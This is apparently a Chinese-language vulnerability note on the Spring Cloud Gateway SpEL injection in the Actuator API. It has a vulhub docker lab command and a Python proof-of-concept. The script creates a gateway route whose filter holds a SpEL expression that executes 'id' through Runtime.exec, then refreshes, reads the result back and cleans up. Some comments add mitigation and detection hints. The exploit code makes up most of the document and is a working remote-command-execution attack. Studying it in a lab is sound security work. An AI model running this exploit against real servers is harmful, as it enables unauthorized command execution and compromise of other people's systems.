简介:
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6(含)以前的版本存在一处SpEL表达式注入漏洞，当攻击者能够访问Actuator API时，即可利用该漏洞执行任意命令。
漏洞环境:
docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0
访问8080端口:
![https://s1.ax1x.com/2022/03/26/qamvHf.png](https://s1.ax1x.com/2022/03/26/qamvHf.png)
POC:
import requests
import json
import re
# Proof-of-concept flow for the SpEL injection described above: (1) create a route
# whose filter argument carries a SpEL expression, (2) refresh routes, (3) read the
# route back and parse the expression result out of the filter description,
# (4) delete the route, (5) refresh again.
# NOTE(review): every request goes to Actuator gateway endpoints; the PoC therefore
# only works when those endpoints are reachable without authentication. Restricting
# or disabling them is the mitigation, and POST/DELETE to /actuator/gateway/routes/<id>
# plus POST to /actuator/gateway/refresh from untrusted clients, or a "#{" inside a
# route filter "value", are the signals a defender should alert on.
# Step 1: add the route
print("cve")
url_host = input("请输入要测试的地址:")
# Route definition. The filter "value" is a SpEL template (#{...}); the server
# presumably evaluates it when the refreshed route set is applied (step 2) — confirm.
data = {
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
# A browser-like User-Agent is sent on every request, so the UA header is not a
# reliable detection signal; key on the endpoint paths and the payload instead.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en',
}
try:
    url = url_host + "/actuator/gateway/routes/hacktest"
    res = requests.post(url=url,data=json.dumps(data),headers=headers)
    print(res.text)
    print(res.status_code)
except Exception as e:
    # Any failure here (malformed URL, connection error, ...) is reported as a bad
    # address; the exception itself is not shown.
    print("输入地址有误请重试")
    exit(1)
# Step 2: refresh the routes so the new definition is loaded
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Content-Length': '0',
'Accept': '*/*',
'Accept-Language': 'en',
}
url = url_host + "/actuator/gateway/refresh"
res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)
# Step 3: read the route back; the filter description in the JSON response carries
# the evaluated expression result, which is extracted with a regex
url = url_host + "/actuator/gateway/routes/hacktest"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '0',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en',
}
try:
    res = requests.get(url=url,headers=headers)
    print(res.text)
    # res.json()["filters"][0] is expected to be a string of the shape shown in the
    # comment below; group(1) is everything after "Result =" with quotes stripped.
    print((re.search(r".*AddResponseHeader Result =(.*)",res.json()["filters"][0])).group(1).replace(r"'",""))
    # [[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)'], order = 1]
    print(res.status_code)
except Exception as e:
    # A request or parse failure is treated as "not vulnerable". NOTE(review): on this
    # path the route created in step 1 is never deleted, so a "hacktest" route stays
    # defined on the target — an artifact worth checking for during incident response.
    print("漏洞不存在")
    exit(1)
# Step 4: delete the route
url = url_host + "/actuator/gateway/routes/hacktest"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en',
}
res = requests.delete(url=url,headers=headers)
print(res.text)
print(res.status_code)
# Step 5: refresh once more so the deleted route is dropped from the live route set
url = url_host + "/actuator/gateway/refresh"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Content-Length': '0',
'Accept': '*/*',
'Accept-Language': 'en',
}
res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)
print("存在漏洞")
若能执行id命令，即代表漏洞存在；反之则不存在。